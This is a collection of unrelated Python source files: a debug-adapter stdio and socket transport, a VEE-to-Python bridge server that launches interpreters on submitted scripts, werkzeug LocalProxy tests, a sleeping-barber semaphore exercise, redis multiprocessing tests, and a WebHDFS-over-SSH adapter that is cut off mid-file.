startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
log.log('transport', f'⟸ process/starting :: {command}')
self.process = Process(command, cwd)
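		# Pump the subprocess's stderr into the logger on a background thread
		# so adapter error output is not lost (see _read below).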
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info('Nothing to read from process, closing')
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: Optional[str] = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
|
server.py
|
from VEEParser import read_string, send_record
from VEEParser import send_string, PYTHON_TO_VEE_TYPES, read_script, R_TO_PYTHON_TYPES
import socket
import argparse
import subprocess
import threading
import os
import uuid
from bridgescripts import BRIDGE_SCRIPTS
import tempfile
from client import Client
PROTOCOLS = set(("DATA","SCRIPT", "SERVERSHUTDOWNTIMEOUT", "GETRESULT", "HALT", "EXECUTE", "BRIDGE", "STATUS", "QUIT"))
client_list = dict()
TIMEOUT = 120
TIMEOUTENABLE = True
HEADER_SIZE = 22
DEBUG = 1
PYTHON_PATH = '.\\python.exe'
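# handle_new_client implements a simple handshake with VEEPro: the client first
# sends one of the PROTOCOLS keywords in a fixed-size HEADER_SIZE frame, then
# (for DATA/SCRIPT) exchanges SEND/SIZE prompts with an 11-byte payload-size
# field before transmitting the payload itself. EXECUTE launches the requested
# interpreter against a bridge script in the temp directory, STATUS polls that
# process, GETRESULT returns the output container built by the bridge
# connection, and BRIDGE is the protocol spoken by the bridge scripts themselves.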
def handle_new_client(conn,s, HOST, PORT):
global PROTOCOLS, PYTHON_TO_VEE_TYPES, HEADER_SIZE, DEBUG, PYTHON_PATH
client = Client(str(uuid.uuid4()))
client_list[client.id] = client
while conn:
try:
recieved_message = conn.recv(HEADER_SIZE) # String given by VEEPro, print this for debugging
except:
conn.close()
break
if(DEBUG):
print(repr(recieved_message))
recieved_message = recieved_message.decode().strip()
if(not recieved_message):
break
        if(recieved_message in PROTOCOLS): # Check if the received message is a protocol
client.protocol = recieved_message
else:
conn.send(send_string("Incorrect Protocol").encode("utf-8"))
continue
if(client.protocol == "DATA"):
conn.send(send_string("SEND").encode())
recievedSize = conn.recv(11).decode("utf-8")
size = int(recievedSize)
conn.send(send_string("SIZE").encode())
recievedContainer = conn.recv(size + 100)
recievedContainer = recievedContainer.decode()
if(DEBUG):
print(repr(recievedContainer))
lines = recievedContainer.split("\n")
for line in lines:
if(line != ''):
client.search_string += line + '\n'
try:
client.input_data = read_string(client.search_string)
except TypeError as err:
client.error[0] = True
client.error[1] = err.args[0]
client.search_string = ''
client.protocol = ''
conn.send(send_string("OK").encode())
elif(client.protocol == "SCRIPT"):
conn.send(send_string("SIZE").encode())
recievedSize = conn.recv(11).decode("utf-8")
size = int(recievedSize)
conn.send(send_string("SEND").encode())
recievedContainer = conn.recv(size + 100).decode("utf-8")
lines = recievedContainer.split("\n")
for line in lines:
if('[' in line):
client.script_string = read_script(line)
if("#!" in client.script_string[:4]):
client.commands = client.script_string.partition('\n')[0][2:].strip().split(" ",1)
client.commands[0] = client.commands[0].lower()
client.script_string = client.script_string.partition('\n')[2] # remove first line of script
else:
client.commands = tuple(["python"])
conn.send(send_string("OK").encode())
elif(client.protocol == "EXECUTE"):
if(not client.script_string or not client.input_data):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
continue
else:
if("python" in client.commands[0]):
if(len(client.commands) > 1):
if(os.path.basename(client.commands[1]) != "python.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
if(os.path.exists(client.commands[1])):
client.running = subprocess.Popen([client.commands[1], f'{tempfile.gettempdir()}\\bridge_python.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
else:
conn.send(send_string("Invalid Path").encode("utf-8"))
continue
else:
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_python.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
if("fiji" in client.commands[0]):
if((os.path.basename(client.commands[1]) != "ImageJ-win64.exe") and (os.path.basename(client.commands[1]) != "ImageJ-win32.exe")):
conn.send(send_string("Invalid Path").encode("utf-8"))
continue
filePath = client.commands[1]
command = f'{filePath} --ij2 --run "{tempfile.gettempdir()}\\bridge_jython.py" "id=\'{client.id}\', host=\'{HOST}\', port={PORT}"'
client.running = subprocess.Popen(command)
if("r" in client.commands[0]):
invalid = False
for item in client.input_data:
if(not client.input_data[item][2]):
conn.send(send_string(f"{item} not an array").encode())
invalid = True
if(invalid):
continue
if(os.path.basename(client.commands[1]) != "R.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
file_path = client.commands[1]
cmd = f"{file_path} --ess --vanilla --args {client.id} {HOST} {PORT}"
client.running = subprocess.Popen(cmd, stdin=subprocess.PIPE,stdout=subprocess.PIPE)
r_thread = threading.Thread(target=client.summon_r, daemon=True)
r_thread.start()
if("octave" in client.commands[0]):
if(os.path.basename(client.commands[1]) != "octave-gui.exe"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_octave.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
if("maxima" in client.commands[0]):
if(os.path.basename(client.commands[1]) != "maxima.bat"):
conn.send(send_string("Incorrect filepath").encode("utf-8"))
continue
client.running = subprocess.Popen([PYTHON_PATH, f'{tempfile.gettempdir()}\\bridge_maxima.py',
client.id, f'--host={HOST}', f'--port={PORT}'])
sendString = send_string("OK")
conn.send(sendString.encode("utf-8"))
elif(client.protocol == "STATUS"):
if(client.error[0]):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
else:
if(client.running):
if(client.running.poll() is None):
conn.send(send_string("BUSY").encode("utf-8"))
else:
conn.send(send_string("OK").encode("utf-8"))
else:
conn.send(send_string("OK").encode("utf-8"))
elif(client.protocol == "GETRESULT"):
if(client.error[0]):
sendString = send_string(client.error[1])
conn.send(sendString.encode("utf-8"))
else:
if(DEBUG):
print(repr(client.output_data))
sendString = send_record(client.output_data)
sendBuffSize = str(len(sendString)) + "\n"
sendToVEE = sendBuffSize + sendString
conn.send(sendToVEE.encode())
if(DEBUG):
print(repr(sendToVEE))
elif(recieved_message == "BRIDGE"): # Bridge protocol (Reserved for Bridgescripts)
            del client_list[client.id] # deletes client from client_list as EXECUTE is not a "real" new client
del client
conn.send(b'OK') # Send OK back
recievedID = conn.recv(36).decode('utf-8') # Get real Client ID
currentClient = client_list[recievedID]
python_bridges = ["python", "embed", "fiji", "maxima"]
if(currentClient.commands[0] in python_bridges):
currentClient.python_bridge(conn)
if(currentClient.commands[0] == "r"):
currentClient.r_bridge(conn)
if(currentClient.commands[0] == "octave"):
currentClient.octave_bridge(conn)
conn.close()
break
elif(recieved_message == "SERVERSHUTDOWNTIMEOUT"):
conn.send(send_string("OK").encode("utf-8"))
recievedSize = int(conn.recv(11).decode("utf-8"))
s.settimeout(recievedSize)
conn.send(send_string("OK").encode("utf-8"))
elif(client.protocol == "QUIT"):
cleanup()
conn.send(send_string("OK").encode("utf-8"))
print("Shutting down server...")
conn.close()
s.close()
break
elif(client.protocol == "HALT"):
conn.send(send_string("OK").encode("utf-8"))
print("Closing Connection...")
del client_list[client.id]
del client
conn.close()
break
def cleanup():
for key in BRIDGE_SCRIPTS:
if(os.path.exists(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}')):
os.remove(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}')
def main(host, port):
global PROTOCOLS, BRIDGE_SCRIPTS, TIMEOUT, TIMEOUTENABLE
for key in BRIDGE_SCRIPTS:
bridgeFile = open(f'{tempfile.gettempdir()}\\bridge_{key}.{BRIDGE_SCRIPTS[key][1]}','w')
bridgeFile.write(BRIDGE_SCRIPTS[key][0])
bridgeFile.close()
isConnected = True
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
try:
if(TIMEOUTENABLE):
s.settimeout(TIMEOUT)
s.bind((host, port))
            print(f'Bound to host = {host} and port = {port}')
print("Listening...")
s.listen()
except Exception as msg:
print('An error occurred:\n' + str(msg))
send_string('An error occurred: ' + str(msg))
isConnected = False
# This while loop means the server is continuously running
while (isConnected):
try:
conn, addr = s.accept() # Waiting for a connection from VEEPro (async)
t1 = threading.Thread(target=handle_new_client, args=(conn,s,host,port,))
t1.daemon = True
t1.start()
except socket.timeout:
print("TIMED OUT")
cleanup()
s.close()
break
except OSError:
cleanup()
s.close()
break
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Initiate the VEE to Python server connection')
parser.add_argument('--host', default='127.0.0.1', help="Connect to a specific host. Default is 127.0.0.1 (localhost).")
parser.add_argument('--port', default=65433, type=int, help="Port to connect to server. Default is 65433.")
args = parser.parse_args()
main(args.host, args.port)
|
test_local.py
|
import asyncio
import copy
import math
import operator
import sys
import time
from functools import partial
from threading import Thread
import pytest
from werkzeug import local
def test_basic_local():
ns = local.Local()
ns.foo = 0
values = []
def value_setter(idx):
time.sleep(0.01 * idx)
ns.foo = idx
time.sleep(0.02)
values.append(ns.foo)
threads = [Thread(target=value_setter, args=(x,)) for x in [1, 2, 3]]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert sorted(values) == [1, 2, 3]
def delfoo():
del ns.foo
delfoo()
pytest.raises(AttributeError, lambda: ns.foo)
pytest.raises(AttributeError, delfoo)
local.release_local(ns)
@pytest.mark.skipif(
sys.version_info < (3, 7),
reason="Locals are not task local in Python 3.6",
)
def test_basic_local_asyncio():
ns = local.Local()
ns.foo = 0
values = []
async def value_setter(idx):
await asyncio.sleep(0.01 * idx)
ns.foo = idx
await asyncio.sleep(0.02)
values.append(ns.foo)
loop = asyncio.get_event_loop()
futures = [asyncio.ensure_future(value_setter(idx)) for idx in [1, 2, 3]]
loop.run_until_complete(asyncio.gather(*futures))
assert sorted(values) == [1, 2, 3]
def delfoo():
del ns.foo
delfoo()
pytest.raises(AttributeError, lambda: ns.foo)
pytest.raises(AttributeError, delfoo)
local.release_local(ns)
def test_local_release():
ns = local.Local()
ns.foo = 42
local.release_local(ns)
assert not hasattr(ns, "foo")
ls = local.LocalStack()
ls.push(42)
local.release_local(ls)
assert ls.top is None
def test_local_stack():
ls = local.LocalStack()
assert ls.top is None
ls.push(42)
assert ls.top == 42
ls.push(23)
assert ls.top == 23
ls.pop()
assert ls.top == 42
ls.pop()
assert ls.top is None
assert ls.pop() is None
assert ls.pop() is None
proxy = ls()
ls.push([1, 2])
assert proxy == [1, 2]
ls.push((1, 2))
assert proxy == (1, 2)
ls.pop()
ls.pop()
assert repr(proxy) == "<LocalProxy unbound>"
@pytest.mark.skipif(
sys.version_info > (3, 6),
reason="The ident is not supported in Python3.7 or higher",
)
def test_custom_idents():
ident = 0
ns = local.Local()
stack = local.LocalStack()
local.LocalManager([ns, stack], ident_func=lambda: ident)
ns.foo = 42
stack.push({"foo": 42})
ident = 1
ns.foo = 23
stack.push({"foo": 23})
ident = 0
assert ns.foo == 42
assert stack.top["foo"] == 42
stack.pop()
assert stack.top is None
ident = 1
assert ns.foo == 23
assert stack.top["foo"] == 23
stack.pop()
assert stack.top is None
def test_proxy_local():
ns = local.Local()
ns.foo = []
p = local.LocalProxy(ns, "foo")
p.append(42)
p.append(23)
p[1:] = [1, 2, 3]
assert p == [42, 1, 2, 3]
assert p == ns.foo
ns.foo += [1]
assert list(p) == [42, 1, 2, 3, 1]
p_from_local = ns("foo")
p_from_local.append(2)
assert p == p_from_local
assert p._get_current_object() is ns.foo
def test_proxy_callable():
value = 42
p = local.LocalProxy(lambda: value)
assert p == 42
value = [23]
p.append(42)
assert p == [23, 42]
assert value == [23, 42]
assert p._get_current_object() is value
def test_proxy_wrapped():
class SomeClassWithWrapped:
__wrapped__ = "wrapped"
def lookup_func():
return 42
proxy = local.LocalProxy(lookup_func)
assert proxy.__wrapped__ is lookup_func
partial_lookup_func = partial(lookup_func)
partial_proxy = local.LocalProxy(partial_lookup_func)
assert partial_proxy.__wrapped__ == partial_lookup_func
ns = local.Local()
ns.foo = SomeClassWithWrapped()
ns.bar = 42
assert ns("foo").__wrapped__ == "wrapped"
pytest.raises(AttributeError, lambda: ns("bar").__wrapped__)
def test_proxy_doc():
def example():
"""example doc"""
assert local.LocalProxy(lambda: example).__doc__ == "example doc"
# The __doc__ descriptor shouldn't block the LocalProxy's class doc.
assert local.LocalProxy.__doc__.startswith("A proxy")
def test_proxy_unbound():
ns = local.Local()
p = ns("value")
assert repr(p) == "<LocalProxy unbound>"
assert not p
assert dir(p) == []
def _make_proxy(value):
ns = local.Local()
ns.value = value
p = ns("value")
return ns, p
def test_proxy_type():
_, p = _make_proxy([])
assert isinstance(p, list)
assert p.__class__ is list
assert issubclass(type(p), local.LocalProxy)
assert type(p) is local.LocalProxy
def test_proxy_string_representations():
class Example:
def __repr__(self):
return "a"
def __bytes__(self):
return b"b"
def __index__(self):
return 23
_, p = _make_proxy(Example())
assert str(p) == "a"
assert repr(p) == "a"
assert bytes(p) == b"b"
# __index__
assert bin(p) == "0b10111"
assert oct(p) == "0o27"
assert hex(p) == "0x17"
def test_proxy_hash():
ns, p = _make_proxy("abc")
assert hash(ns.value) == hash(p)
@pytest.mark.parametrize(
"op",
[
operator.lt,
operator.le,
operator.eq,
operator.ne,
operator.gt,
operator.ge,
operator.add,
operator.sub,
operator.mul,
operator.truediv,
operator.floordiv,
operator.mod,
divmod,
pow,
operator.lshift,
operator.rshift,
operator.and_,
operator.or_,
operator.xor,
],
)
def test_proxy_binop_int(op):
_, p = _make_proxy(2)
assert op(p, 3) == op(2, 3)
# r-op
assert op(3, p) == op(3, 2)
@pytest.mark.parametrize("op", [operator.neg, operator.pos, abs, operator.invert])
def test_proxy_uop_int(op):
_, p = _make_proxy(-2)
assert op(p) == op(-2)
def test_proxy_numeric():
class Example:
def __complex__(self):
return 1 + 2j
def __int__(self):
return 1
def __float__(self):
return 2.1
def __round__(self, n=None):
if n is not None:
return 3.3
return 3
def __trunc__(self):
return 4
def __floor__(self):
return 5
def __ceil__(self):
return 6
def __index__(self):
return 2
_, p = _make_proxy(Example())
assert complex(p) == 1 + 2j
assert int(p) == 1
assert float(p) == 2.1
assert round(p) == 3
assert round(p, 2) == 3.3
assert math.trunc(p) == 4
assert math.floor(p) == 5
assert math.ceil(p) == 6
assert [1, 2, 3][p] == 3 # __index__
@pytest.mark.parametrize(
"op",
[
operator.iadd,
operator.isub,
operator.imul,
operator.imatmul,
operator.itruediv,
operator.ifloordiv,
operator.imod,
operator.ipow,
operator.ilshift,
operator.irshift,
operator.iand,
operator.ior,
operator.ixor,
],
)
def test_proxy_iop(op):
class Example:
value = 1
def fake_op(self, other):
self.value = other
return self
__iadd__ = fake_op
__isub__ = fake_op
__imul__ = fake_op
__imatmul__ = fake_op
__itruediv__ = fake_op
__ifloordiv__ = fake_op
__imod__ = fake_op
__ipow__ = fake_op
__ilshift__ = fake_op
__irshift__ = fake_op
__iand__ = fake_op
__ior__ = fake_op
__ixor__ = fake_op
ns, p = _make_proxy(Example())
p_out = op(p, 2)
assert type(p_out) is local.LocalProxy
assert p.value == 2
assert ns.value.value == 2
def test_proxy_matmul():
class Example:
def __matmul__(self, other):
return 2 * other
def __rmatmul__(self, other):
return 2 * other
_, p = _make_proxy(Example())
assert p @ 3 == 6
assert 4 @ p == 8
def test_proxy_str():
_, p = _make_proxy("{act} %s")
assert p + " world" == "{act} %s world"
assert "say " + p == "say {act} %s"
assert p * 2 == "{act} %s{act} %s"
assert 2 * p == p * 2
assert p % ("world",) == "{act} world"
assert p.format(act="test") == "test %s"
def test_proxy_list():
_, p = _make_proxy([1, 2, 3])
assert len(p) == 3
assert p[0] == 1
assert 3 in p
assert 4 not in p
assert tuple(p) == (1, 2, 3)
assert list(reversed(p)) == [3, 2, 1]
p[0] = 4
assert p == [4, 2, 3]
del p[-1]
assert p == [4, 2]
p += [5]
assert p[-1] == 5
p *= 2
assert len(p) == 6
p[:] = []
assert not p
p.append(1)
assert p
assert p + [2] == [1, 2]
assert [2] + p == [2, 1]
def test_proxy_copy():
class Foo:
def __copy__(self):
return self
def __deepcopy__(self, memo):
return self
ns, p = _make_proxy(Foo())
assert copy.copy(p) is ns.value
assert copy.deepcopy(p) is ns.value
a = []
_, p = _make_proxy([a])
assert copy.copy(p) == [a]
assert copy.copy(p)[0] is a
assert copy.deepcopy(p) == [a]
assert copy.deepcopy(p)[0] is not a
def test_proxy_iterator():
a = [1, 2, 3]
_, p = _make_proxy(iter(a))
assert next(p) == 1
def test_proxy_length_hint():
class Example:
def __length_hint__(self):
return 2
_, p = _make_proxy(Example())
assert operator.length_hint(p) == 2
def test_proxy_context_manager():
class Example:
value = 2
def __enter__(self):
self.value += 1
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.value -= 1
_, p = _make_proxy(Example())
assert p.value == 2
with p:
assert p.value == 3
assert p.value == 2
def test_proxy_class():
class Meta(type):
def __instancecheck__(cls, instance):
return True
def __subclasscheck__(cls, subclass):
return True
class Parent:
pass
class Example(Parent, metaclass=Meta):
pass
class Child(Example):
pass
_, p = _make_proxy(Example)
assert type(p()) is Example
assert isinstance(1, p)
assert issubclass(int, p)
assert p.__mro__ == (Example, Parent, object)
assert p.__bases__ == (Parent,)
assert p.__subclasses__() == [Child]
def test_proxy_attributes():
class Example:
def __init__(self):
object.__setattr__(self, "values", {})
def __getattribute__(self, name):
if name == "ham":
return "eggs"
return super().__getattribute__(name)
def __getattr__(self, name):
return self.values.get(name)
def __setattr__(self, name, value):
self.values[name] = value
def __delattr__(self, name):
del self.values[name]
def __dir__(self):
return sorted(self.values.keys())
_, p = _make_proxy(Example())
assert p.nothing is None
assert p.__dict__ == {"values": {}}
assert dir(p) == []
p.x = 1
assert p.x == 1
assert dir(p) == ["x"]
del p.x
assert dir(p) == []
assert p.ham == "eggs"
p.ham = "spam"
assert p.ham == "eggs"
assert p.values["ham"] == "spam"
def test_proxy_await():
async def get():
return 1
_, p = _make_proxy(get())
async def main():
return await p
out = asyncio.get_event_loop().run_until_complete(main())
assert out == 1
def test_proxy_aiter():
class Example:
value = 3
def __aiter__(self):
return self
async def __anext__(self):
if self.value:
self.value -= 1
return self.value
raise StopAsyncIteration
_, p = _make_proxy(Example())
async def main():
out = []
async for v in p:
out.append(v)
return out
out = asyncio.get_event_loop().run_until_complete(main())
assert out == [2, 1, 0]
def test_proxy_async_context_manager():
class Example:
value = 2
async def __aenter__(self):
self.value += 1
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
self.value -= 1
_, p = _make_proxy(Example())
async def main():
async with p:
assert p.value == 3
assert p.value == 2
return True
assert asyncio.get_event_loop().run_until_complete(main())
|
main.py
|
# TODO: check this solution!
from threading import Semaphore, Thread, Lock
from collections import deque
io = Lock()
hey_barber = Semaphore(0)
room = Semaphore(1)
standing = deque()
sitting = deque()
serviced = 0
cashdesk = Semaphore(1)
paying = 0
satisfied = Semaphore(0)
done = Semaphore(0)
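# Synchronization scheme (as implied by the code below):
#   room        guards the shared waiting-room state (standing/sitting/serviced/paying)
#   hey_barber  wakes a barber whenever a customer sits down or is ready to pay
#   you_next    per-customer semaphore released by the barber who starts the haircut
#   satisfied   customer -> barber handshake that the haircut is finished
#   cashdesk    serializes access to the single cash desk
#   done        barber -> customer handshake that payment has been accepted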
def customer_worker():
global serviced, paying
you_next = Semaphore(0)
with room:
if len(sitting) + len(standing) + serviced >= 20:
return
elif len(sitting) >= 4:
standing.append(you_next)
else:
sitting.append(you_next)
hey_barber.release()
you_next.acquire()
# Being cut...
satisfied.release()
with room:
serviced -= 1
paying += 1
with cashdesk:
hey_barber.release()
# Paying...
done.acquire()
def barber_worker():
global serviced, paying
while True:
hey_barber.acquire()
with room:
with io: print('awoken', ';', 'standing:', len(standing), ';', 'sitting:', len(sitting), ';', end=' ')
if paying:
with io: print('accepting payment')
# Accepting payment...
paying -= 1
done.release()
continue
else:
with io: print('doing haircut')
you_next = sitting.popleft()
serviced += 1
if standing:
sitting.append(standing.popleft())
hey_barber.release()
you_next.release()
# Cutting...
satisfied.acquire()
threads = (
[Thread(target=customer_worker) for _ in range(200)] +
[Thread(target=barber_worker) for _ in range(3)]
)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test_multiprocessing.py
|
import pytest
import multiprocessing
import contextlib
import redis
from redis.connection import Connection, ConnectionPool
from redis.exceptions import ConnectionError
from .conftest import _get_client
@contextlib.contextmanager
def exit_callback(callback, *args):
try:
yield
finally:
callback(*args)
class TestMultiprocessing(object):
# Test connection sharing between forks.
# See issue #1085 for details.
# use a multi-connection client as that's the only type that is
# actually fork/process-safe
@pytest.fixture()
def r(self, request):
return _get_client(
redis.Redis,
request=request,
single_connection_client=False)
def test_close_connection_in_child(self, master_host):
"""
A connection owned by a parent and closed by a child doesn't
destroy the file descriptors so a parent can still use it.
"""
conn = Connection(host=master_host)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
conn.disconnect()
proc = multiprocessing.Process(target=target, args=(conn,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# The connection was created in the parent but disconnected in the
# child. The child called socket.close() but did not call
# socket.shutdown() because it wasn't the "owning" process.
# Therefore the connection still works in the parent.
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def test_close_connection_in_parent(self, master_host):
"""
A connection owned by a parent is unusable by a child if the parent
(the owning process) closes the connection.
"""
conn = Connection(host=master_host)
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(conn, ev):
ev.wait()
# the parent closed the connection. because it also created the
# connection, the connection is shutdown and the child
# cannot use it.
with pytest.raises(ConnectionError):
conn.send_command('ping')
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(conn, ev))
proc.start()
conn.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_pool(self, max_connections, master_host):
"""
A child will create its own connections when using a pool created
by a parent.
"""
pool = ConnectionPool.from_url('redis://{}'.format(master_host),
max_connections=max_connections)
conn = pool.get_connection('ping')
main_conn_pid = conn.pid
with exit_callback(pool.release, conn):
conn.send_command('ping')
assert conn.read_response() == b'PONG'
def target(pool):
with exit_callback(pool.disconnect):
conn = pool.get_connection('ping')
assert conn.pid != main_conn_pid
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
proc = multiprocessing.Process(target=target, args=(pool,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
# Check that connection is still alive after fork process has exited
# and disconnected the connections in its pool
conn = pool.get_connection('ping')
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
@pytest.mark.parametrize('max_connections', [1, 2, None])
def test_close_pool_in_main(self, max_connections, master_host):
"""
A child process that uses the same pool as its parent isn't affected
when the parent disconnects all connections within the pool.
"""
pool = ConnectionPool.from_url('redis://{}'.format(master_host),
max_connections=max_connections)
conn = pool.get_connection('ping')
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
def target(pool, disconnect_event):
conn = pool.get_connection('ping')
with exit_callback(pool.release, conn):
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
disconnect_event.wait()
assert conn.send_command('ping') is None
assert conn.read_response() == b'PONG'
ev = multiprocessing.Event()
proc = multiprocessing.Process(target=target, args=(pool, ev))
proc.start()
pool.disconnect()
ev.set()
proc.join(3)
assert proc.exitcode == 0
def test_redis_client(self, r):
"A redis client created in a parent can also be used in a child"
assert r.ping() is True
def target(client):
assert client.ping() is True
del client
proc = multiprocessing.Process(target=target, args=(r,))
proc.start()
proc.join(3)
assert proc.exitcode == 0
assert r.ping() is True
|
hdfsoverssh.py
|
"""
WebHDFS based LVFS Adapter
==========================
This module is extremely flexible and supports many modes of operation but configuring it properly
can be challenging. Most of the time you will only need a few common configurations. Refer to the
project homepage for examples. Your company may also have recommended configurations, so check for
internal corporate documentation as well.
"""
from collections import namedtuple
import subprocess
import secrets
import time
import logging
import atexit
from typing import List, Optional
from threading import Thread
import hdfs
import requests
try:
from requests_gssapi import HTTPSPNEGOAuth
except ModuleNotFoundError as err:
HTTPSPNEGOAuth = err
from lvfs.url import URL
from lvfs.stat import Stat
from lvfs.credentials import Credentials
def _wrap_error(method):
""" Wrap a function that throws HDFSError
so that it throws the right IOErrors instead """
async def inner(*args, **kwargs):
try:
return await method(*args, **kwargs)
except hdfs.util.HdfsError as err:
if "not found" in err.message:
raise FileNotFoundError from err
elif "not a directory" in err.message:
raise NotADirectoryError from err
elif "is a directory" in err.message:
raise IsADirectoryError from err
raise IOError from err
return inner
HoSCreds = namedtuple("HoSCreds", [
"username",
"password",
"ssh_username",
"ssh_jump_host",
"webhdfs_root"
])
class HDFSOverSSH(URL):
""" Connect to HDFS via the CLI on the other end of an SSH tunnel """
__tunnel: Optional[subprocess.Popen] = None
__tunnel_port: Optional[int] = None
__client: Optional[hdfs.InsecureClient] = None
__canary: Optional[Thread] = None
@classmethod
def __creds(cls):
# For the time being, we only support protocol-level credential realms
creds = Credentials.match(classname="HDFSOverSSH")
ssh_jump_host = creds.get("ssh_jump_host")
ssh_username = creds.get("ssh_username")
username = creds.get("username")
password = creds.get("password")
webhdfs_root = creds.get("webhdfs_root")
#
# See module level docstring for details on what this is doing.
#
if (ssh_jump_host is None) != (ssh_username is None):
raise ValueError(
"HDFSOverSSH needs either both ssh_jump_host and ssh_username or neither."
f" For more information, see below:\n\n{__doc__}"
)
if username == "kerberos" and password is not None:
raise ValueError(
"HDFSOverSSH with kerberos doesn't support using passwords, which are only for AD"
f" For more information, see below:\n\n{__doc__}"
)
if not webhdfs_root:
raise ValueError(
"HDFSOverSSH is missing webhdfs_root."
" You probably need to update your lvfs.yml for new changes with HDP3."
f" For more information, see below:\n\n{__doc__}"
)
return HoSCreds(username, password, ssh_username, ssh_jump_host, webhdfs_root)
@classmethod
def __setup_ssh_tunnel(cls):
""" Setup an SSH SOCKS5 proxy.
An proxy is not always required, so don't assume self.__tunnel exists.
Returns
-------
int
The port number associated with the proxy
"""
#
# Check if the tunnel is already setup and skip if it is.
#
if cls.__tunnel is None or cls.__tunnel.poll() is not None:
if cls.__tunnel is not None:
# The tunnel has died. Collect the zombie process.
logging.info("HDFS SSH tunnel disconnected. Reconnecting.")
cls.__tunnel.wait()
# Start SSH to get the tunnel going
cls.__tunnel_port = 30000 + secrets.randbelow(20000)
cls.__tunnel = subprocess.Popen([
"ssh", "-N", "-D", str(cls.__tunnel_port),
f"{cls.__creds().ssh_username}@{cls.__creds().ssh_jump_host}"
])
def deltunnel():
""" Promptly disconnect the SSH tunnel when exiting Python,
to avoid resource leaks
"""
cls.__tunnel.terminate()
cls.__tunnel.wait()
atexit.register(deltunnel) # This will run this function when python exits
def canary():
""" Occasionally send small requests to keep the SSH tunnel open and avoid it
getting disconnected due to inactivity.
No special work is necessary to rebuild the connection. If the connection
was lost, it will be reconnected automatically as a result of this request.
This can also help diagnose problems quickly if network issues arise with any
long running process that may be idle a while (like APIs or event listeners)
"""
            # time.sleep() returns None, so `while time.sleep(25):` would never
            # run the body; loop forever and sleep between keepalive pings instead.
            while True:
                time.sleep(25)
                try:
                    URL.to("hdfs://").stat()
                except IOError as ioe:
                    raise RuntimeError("HDFS keepalive canary died") from ioe
if cls.__canary is None or not cls.__canary.is_alive():
cls.__canary = Thread(daemon=True, target=canary)
cls.__canary.start()
return cls.__tunnel_port
@classmethod
def __connect(cls):
""" Connect to HDFS, configured as required in lvfs.yml.
This may or may not start an SSH tunnel.
Returns
-------
hdfs.Client or a subclass of it
A client connected to HDFS.
Despite the name InsecureClient, it may actually be secure if configured properly.
"""
#
# Check the tunnel is running if necessary
#
creds = cls.__creds()
session = requests.Session()
if creds.ssh_username:
# This connection requires SSH tunneling
port = cls.__setup_ssh_tunnel()
session.proxies = {
"http": f"socks5://localhost:{port}",
